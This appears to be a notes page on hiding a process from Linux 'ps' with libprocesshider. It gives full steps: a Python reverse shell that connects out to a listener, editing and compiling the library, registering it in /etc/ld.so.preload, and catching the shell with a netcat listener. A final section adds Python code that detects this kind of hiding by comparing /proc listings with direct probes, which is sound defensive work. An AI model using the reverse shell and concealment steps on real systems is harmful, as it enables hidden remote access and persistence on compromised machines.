## General
GOAL ---> Hide process from `ps aux`
libprocesshider is a shared library that hides a process from user-space process-listing tools on Linux. It is registered through `/etc/ld.so.preload` and hooks `readdir()`, the libc call that `ps`, `top` and similar tools use to enumerate `/proc`, so the entry whose command name matches the name built into the library is filtered out of the listing. The process keeps running normally and stays visible to the kernel; only tools that walk `/proc` through the hooked call are affected. It is used to hide malware or other malicious software, and is also pitched as a way to keep proprietary software out of sight.
Important

- Can only hide one process at a time (the name to filter is set in `processhider.c` before compiling)
## Commands
The repository needs to be cloned on the target (a Linux machine; the steps below rely on `make` and `/etc/ld.so.preload`).
Download the repository (Target)

```
git clone https://github.com/gianlucaborello/libprocesshider.git
```
Create the reverse shell and compile the library (Target)

Create the reverse shell script (`nano reverse_shell.py`), replacing `IP` and `PORT` with the listener address:

```
#!/usr/bin/python3
from os import dup2
from subprocess import run
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("IP", PORT))
dup2(s.fileno(), 0)
dup2(s.fileno(), 1)
dup2(s.fileno(), 2)
run(["/bin/bash", "-i"])
```

Then build and install the library:

```
# Make the script executable
chmod +x reverse_shell.py

# Edit processhider.c: replace the sample python script name in the filter
# with the name of your reverse shell script, then save
nano processhider.c

# Compile the code in the repository directory
USER@sid:~/libprocesshider$ make
# ---> This will create libprocesshider.so

# Copy the library into place
cp libprocesshider.so /usr/local/lib/

# Register it with the global dynamic linker (preloaded into every new process)
echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload
```
Launch the reverse shell (Target)

```
./reverse_shell.py
```
Netcat Listener (Attacking)

```
nc -lvnp PORT
```
The process should now be hidden from `ps aux`. It is only hidden from tools that enumerate `/proc` through the hooked `readdir()`: a direct look at `/proc/<pid>` still finds it, and the library path stays listed in `/etc/ld.so.preload`, which is the first thing to check on a suspect host.
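As an added defensive example (my own code, not part of libprocesshider or this page), a check that detects this class of hiding: it diffs the PIDs that `readdir()` reports against a direct `stat()` probe of every `/proc/<pid>`, re-checks candidates to rule out processes that simply exited, and prints whatever is registered in `/etc/ld.so.preload`. Function names are my own; the full probe walks up to `pid_max` entries, so it takes a while on hosts with a large `pid_max`.

```python
#!/usr/bin/env python3
"""Detect readdir()-based process hiding (the libprocesshider technique): a
hooked readdir() drops one /proc entry, but stat() of /proc/<pid> still works."""
import os
from typing import Iterable, List, Set


def parse_ld_so_preload(text: str) -> List[str]:
    """Paths registered for global preloading (a whitespace-separated list)."""
    return text.split()


def hidden_pids(listed: Iterable[int], probed: Iterable[int]) -> List[int]:
    """PIDs found by direct probing but missing from the directory listing."""
    return sorted(set(probed) - set(listed))


def listed_pids(proc: str = "/proc") -> Set[int]:
    """PIDs as the (possibly hooked) readdir() reports them."""
    return {int(n) for n in os.listdir(proc) if n.isdigit()}


def probed_pids(proc: str = "/proc", pid_max: int = 0) -> Set[int]:
    """PIDs whose /proc/<pid> exists, checked with stat() one at a time."""
    if not pid_max:
        with open(f"{proc}/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    return {p for p in range(1, pid_max + 1) if os.path.exists(f"{proc}/{p}")}


def scan(proc: str = "/proc") -> List[int]:
    """Hidden PIDs, re-checked so processes that started or exited between the
    two passes (a normal race, not hiding) are not reported."""
    listed = listed_pids(proc)
    candidates = hidden_pids(listed, probed_pids(proc))
    return [p for p in candidates
            if os.path.exists(f"{proc}/{p}") and p not in listed_pids(proc)]


if __name__ == "__main__":
    try:
        with open("/etc/ld.so.preload") as f:
            print("ld.so.preload entries:", parse_ld_so_preload(f.read()))
    except FileNotFoundError:
        print("no /etc/ld.so.preload (expected on a clean host)")
    for pid in scan():
        with open(f"/proc/{pid}/comm") as f:  # open() is not hooked either
            print(f"hidden pid {pid}: {f.read().strip()}")
```

Run it as root on the suspect host; a non-empty hidden list or an unexpected preload entry is the finding.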
## More Information
More information ---> https://github.com/gianlucaborello/libprocesshider